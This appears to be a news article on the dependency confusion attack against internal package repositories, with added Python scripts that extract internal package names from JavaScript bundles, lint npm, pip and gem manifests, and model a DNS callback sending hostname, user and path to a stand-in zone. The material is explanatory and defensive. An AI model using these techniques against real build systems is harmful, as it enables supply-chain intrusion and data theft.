Dependency confusion attack allows code execution at PayPal, Microsoft, Apple, Netflix, Uber and some 30 other companies

A few days ago a deceptively simple technique was published that allows an attack on the dependencies of applications built with internal package repositories. The researchers who identified the problem were able to run their code on the internal servers of 35 companies, including PayPal, Microsoft, Apple, Netflix, Uber, Tesla and Shopify.

The attacks were carried out within Bug Bounty programmes, in coordination with the targeted companies, and the researchers have already received $130,000 in rewards for the vulnerabilities they found.

The method relies on the fact that many companies use standard dependencies from the NPM, PyPI and RubyGems repositories in their internal applications alongside internal dependencies that are not published and are downloaded from the company's own repositories.

The problem is that package managers such as npm, pip and gem also try to download a company's internal dependencies from public repositories. To attack, it is enough to learn the names of the internal dependencies and publish packages with the same names in the public NPM, PyPI and RubyGems repositories.

The problem is not specific to NPM, PyPI and RubyGems; it also appears in other systems such as NuGet, Maven and Yarn.

The idea for the technique came after the researcher noticed by chance that, in publicly available code published on GitHub, many companies do not remove references to extra dependencies from the manifest files used in internal projects or for additional functionality. Such traces were found in the JavaScript code of web services as well as in the Node.js, Python and Ruby projects of many companies.

The main leaks come from package.json contents being embedded into publicly served JavaScript during the build, and from real path components in require() calls, from which the names of dependencies can be inferred.

Scanning several million corporate domains revealed many JavaScript package names that did not exist in the NPM repository. After compiling a database of internal package names, the researcher decided to run an experiment: hijack the infrastructure of companies participating in Bug Bounty programmes. The result was surprisingly effective; the researcher managed to run his code on many development machines and on servers responsible for builds or tests in continuous integration systems.
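The two leak sources named above (a package.json embedded by the bundler, and bare module names in require() calls) are enough to reconstruct candidate internal dependency names from a public JavaScript bundle. The script below is an added example and not the researcher's tooling: the bundle text is constructed, and the set of "known public" names stands in for the real check against the public registry, which the script does not perform.

```python
"""Recover candidate internal dependency names from a public JavaScript bundle.

Added example, not code from the article or the researcher. It covers the two
leak sources the article describes: package.json content embedded verbatim by
a bundler, and bare module names in require() calls. The bundle text and the
KNOWN_PUBLIC set below are constructed sample input.
"""
import json
import re

# Constructed stand-in for "does this name exist on the public registry?".
# The real check is a query against the public registry, which is not done here.
KNOWN_PUBLIC = {"react", "lodash", "express", "axios"}

# Node built-ins and relative/absolute paths never resolve to a registry package.
NODE_BUILTINS = {"fs", "path", "os", "http", "https", "crypto", "child_process", "url", "util"}

REQUIRE_RE = re.compile(r"""require\(\s*['"]([^'"]+)['"]\s*\)""")
DEPS_RE = re.compile(r'"(?:dependencies|devDependencies)"\s*:\s*(\{[^{}]*\})')


def registry_name(specifier):
    """Map a require() specifier to the registry package it would resolve to.

    'lodash/fp'       -> 'lodash'
    '@acme/ui/dist'   -> '@acme/ui'
    './local', 'fs'   -> None
    """
    if specifier.startswith((".", "/", "node:")):
        return None
    parts = specifier.split("/")
    name = "/".join(parts[:2]) if specifier.startswith("@") else parts[0]
    if name in NODE_BUILTINS:
        return None
    return name


def extract_names(bundle):
    """Return the set of registry package names a bundle references."""
    names = set()
    for spec in REQUIRE_RE.findall(bundle):
        name = registry_name(spec)
        if name:
            names.add(name)
    for block in DEPS_RE.findall(bundle):
        try:
            names.update(json.loads(block))  # keys of the embedded dependency map
        except json.JSONDecodeError:
            continue  # minified or partial object; skip it
    return names


def confusion_candidates(bundle, public_names=KNOWN_PUBLIC):
    """Names not known to be public packages: the list an attacker registers first
    and the list a defender checks for scope binding or private-registry pinning."""
    return sorted(n for n in extract_names(bundle) if n not in public_names)


# Constructed webpack-style output with both leak types present.
SAMPLE_BUNDLE = r'''
var __pkg = {"name":"acme-portal","version":"3.4.1","dependencies":{"react":"^17.0.2","acme-auth-client":"^2.1.0","acme-telemetry":"1.0.3"}};
var e=require("react"),a=require('axios'),p=require("path");
var t=require("acme-telemetry/browser"),u=require("@acme/ui/dist/button.js");
var l=require("./lib/helpers"),q=require("lodash/fp");
'''

if __name__ == "__main__":
    for name in confusion_candidates(SAMPLE_BUNDLE):
        print(name)
```

Scoped names such as @acme/ui are kept in the output on purpose: whether they are safe depends on whether the organisation owns that scope on the public registry, which is the next thing to check after extraction.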

When fetching dependencies, the npm, pip and gem package managers primarily pulled packages from the main public repositories NPM, PyPI and RubyGems, which were treated as having higher priority.

The presence of packages with the same names in the company's private repositories was ignored, without any warning or error that might have drawn an administrator's attention. In PyPI the version number decided the download priority (regardless of the repository, the newest version of the package was downloaded). In NPM and RubyGems the priority depended only on the repository.
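The two resolution behaviours just described are what a manifest check has to look for: for pip, a configuration that merges a public index with the private one (--extra-index-url), because the highest version then wins regardless of index; for npm and gem, internal names that are not bound to a single private source. The linter below is an added example, not from the article or the affected companies; the internal package names, manifests and .npmrc content are constructed, and the Gemfile rule (more than one global source) is an assumption about how such a check would be written.

```python
"""Lint dependency manifests for dependency-confusion exposure.

Added example, not code from the article. Rules follow the behaviours the
article describes: pip with --extra-index-url picks the highest version across
all indexes, while npm and gem resolve by repository, so an internal name that
is not bound to a private registry can be served by the public one. The
INTERNAL_NAMES set and every SAMPLE_* input below are constructed.
"""
import json
import re

# Constructed: names that exist only in the company's private registries.
INTERNAL_NAMES = {"acme-auth-client", "acme-logging", "acme_payments", "acme-billing"}
_NORMALISED_INTERNAL = {n.lower().replace("_", "-") for n in INTERNAL_NAMES}


def lint_package_json(text, npmrc=""):
    """Findings for npm dependencies the public registry could satisfy.

    A dependency counts as bound only if it is scoped (@scope/name) and .npmrc
    maps that scope to a registry ("@scope:registry=https://...").
    """
    manifest = json.loads(text)
    pinned_scopes = set(re.findall(r"^@([\w-]+):registry=", npmrc, re.M))
    findings = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name in manifest.get(section, {}):
            if name.startswith("@"):
                scope = name[1:].split("/", 1)[0]
                if scope not in pinned_scopes:
                    findings.append((name, "scope not bound to a private registry in .npmrc"))
            elif name in INTERNAL_NAMES:
                findings.append((name, "unscoped internal name; resolvable from the public registry"))
    return findings


def lint_requirements(text):
    """Findings for a pip requirements file.

    --extra-index-url merges candidates from every index and the highest version
    wins, so a public upload with an inflated version shadows the private one.
    Internal names without a --hash pin are flagged as well.
    """
    findings = []
    lines = [ln.strip() for ln in text.splitlines() if ln.strip() and not ln.startswith("#")]
    if any(ln.startswith("--extra-index-url") for ln in lines):
        findings.append(("--extra-index-url", "public and private indexes merged; highest version wins"))
    for ln in lines:
        if ln.startswith("-"):
            continue  # option line, not a requirement
        name = re.split(r"[=<>!~\s\[;]", ln, maxsplit=1)[0].lower().replace("_", "-")
        if name in _NORMALISED_INTERNAL and "--hash=" not in ln:
            findings.append((name, "internal name not pinned with --hash"))
    return findings


def lint_gemfile(text):
    """Findings for a Gemfile with more than one global `source` line.

    Assumed rule: with several global sources a gem is not tied to one of them;
    a `source "..." do ... end` block per private gem avoids the ambiguity.
    """
    global_sources = re.findall(r'^source\s+["\']([^"\']+)["\']\s*$', text, re.M)
    if len(global_sources) > 1:
        return [("source", f"{len(global_sources)} global sources; gems not bound to one")]
    return []


def lint_all(package_json, npmrc, requirements, gemfile):
    return {
        "package.json": lint_package_json(package_json, npmrc),
        "requirements.txt": lint_requirements(requirements),
        "Gemfile": lint_gemfile(gemfile),
    }


# Constructed sample manifests showing the weak configurations.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "acme-web", "private": True,
    "dependencies": {"express": "^4.18.2", "acme-auth-client": "^2.1.0", "@acme/ui": "^1.0.0"},
    "devDependencies": {"acme-logging": "^1.4.0"},
})
SAMPLE_NPMRC = "registry=https://npm.internal.example/\n"  # no @acme:registry binding
SAMPLE_REQUIREMENTS = """\
--index-url https://pypi.internal.example/simple
--extra-index-url https://pypi.org/simple
requests==2.31.0
acme_payments==3.2.0
"""
SAMPLE_GEMFILE = """\
source "https://rubygems.org"
source "https://gems.internal.example"
gem "rails"
gem "acme-billing"
"""

if __name__ == "__main__":
    for manifest, findings in lint_all(SAMPLE_PACKAGE_JSON, SAMPLE_NPMRC,
                                       SAMPLE_REQUIREMENTS, SAMPLE_GEMFILE).items():
        for item, reason in findings:
            print(f"{manifest}: {item}: {reason}")
```

Adding the line `@acme:registry=https://npm.internal.example/` to the sample .npmrc clears the @acme/ui finding, which is the point of the npm rule: the scope, not the default registry, is what ties the name to the private source.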

The researcher published packages in the NPM, PyPI and RubyGems repositories whose names matched the internal dependencies he had found, adding code to the script that runs before installation (preinstall in NPM) to collect information about the system and send it to an external host.

To report a successful compromise while bypassing firewalls that block outbound traffic, a covert channel over the DNS protocol was used: the running code resolved a host name within a domain under the attacker's control, so that successful executions could be collected on that domain's DNS server. The hostname, the user name and the current path were transmitted.
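The callback works because a DNS lookup for a name under the attacker's zone reaches that zone's authoritative server even where all other outbound traffic is blocked. The model below is an added example, not the researcher's payload or server: the encoding (hex labels, a separator label, the 63-byte label limit), the zone name, the host/user/path values and the query-log lines are all assumptions made here. It shows both ends of the channel plus the heuristic a defender can run over resolver logs.

```python
"""Model of a DNS callback carrying hostname, user and cwd, and of the receiving
side reading it back out of an authoritative server's query log.

Added example, not code from the article or the researcher. The encoding
scheme, zone, sample values and log lines are constructed assumptions; only
the DNS limits used (63 bytes per label, 253 characters per name) are fixed.
"""
import re

CALLBACK_ZONE = "dc.example.test"  # constructed: zone the attacker's server is authoritative for
QUERY_RE = re.compile(r"query: (\S+) IN")


def encode_callback(hostname, username, cwd, zone=CALLBACK_ZONE):
    """Build the query name carrying host, user and cwd as hex labels under zone."""
    labels = []
    for field in (hostname, username, cwd):
        hexed = field.encode("utf-8").hex()
        # Split into 63-byte labels so the name stays valid DNS.
        labels.extend(hexed[i:i + 63] for i in range(0, len(hexed), 63))
        labels.append("x")  # separator: 'x' is never a hex digit, so it cannot be mistaken for data
    name = ".".join(labels) + "." + zone
    if len(name) > 253:
        raise ValueError("name exceeds DNS limit; caller must truncate cwd")
    return name


def decode_callback(qname, zone=CALLBACK_ZONE):
    """Recover (hostname, username, cwd) from a query name under zone."""
    if not qname.endswith("." + zone):
        raise ValueError("query not under callback zone")
    fields, current = [], []
    for label in qname[: -len(zone) - 1].split("."):
        if label == "x":
            fields.append(bytes.fromhex("".join(current)).decode("utf-8"))
            current = []
        else:
            current.append(label)
    if len(fields) != 3:
        raise ValueError("malformed callback")
    return tuple(fields)


def harvest(log_lines, zone=CALLBACK_ZONE):
    """Decode every callback present in authoritative-server query log lines."""
    results = []
    for line in log_lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        try:
            results.append(decode_callback(m.group(1), zone))
        except ValueError:
            continue  # ordinary lookups under the zone, or other zones
    return results


def looks_like_exfil(qname):
    """Defender-side heuristic: two or more long, purely hexadecimal labels."""
    labels = qname.split(".")
    hexish = [l for l in labels if len(l) >= 16 and re.fullmatch(r"[0-9a-f]+", l)]
    return len(hexish) >= 2


# Constructed values a preinstall script would read on a build agent.
SAMPLE_HOST = "build-agent-07.corp.example"
SAMPLE_USER = "jenkins"
SAMPLE_CWD = "/var/lib/jenkins/workspace/acme-portal"

# Constructed query-log lines as seen on the authoritative server.
SAMPLE_QUERY_LOG = [
    "client 203.0.113.7#51234: query: " + encode_callback(SAMPLE_HOST, SAMPLE_USER, SAMPLE_CWD) + " IN A +",
    "client 203.0.113.9#40001: query: www.dc.example.test IN A +",
    "client 203.0.113.9#40002: query: example.org IN A +",
]

if __name__ == "__main__":
    for host, user, cwd in harvest(SAMPLE_QUERY_LOG):
        print(f"{host} {user} {cwd}")
```

The same structure that makes the channel work (several long hex labels under one zone) is what makes it visible in resolver logs, so the heuristic in looks_like_exfil is worth running over outbound DNS from build and CI hosts, which should rarely resolve such names.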

75% of all recorded code executions came from NPM package downloads, mainly because there are significantly more internal JavaScript module names than Python and Ruby ones.

Source: https://medium.com/

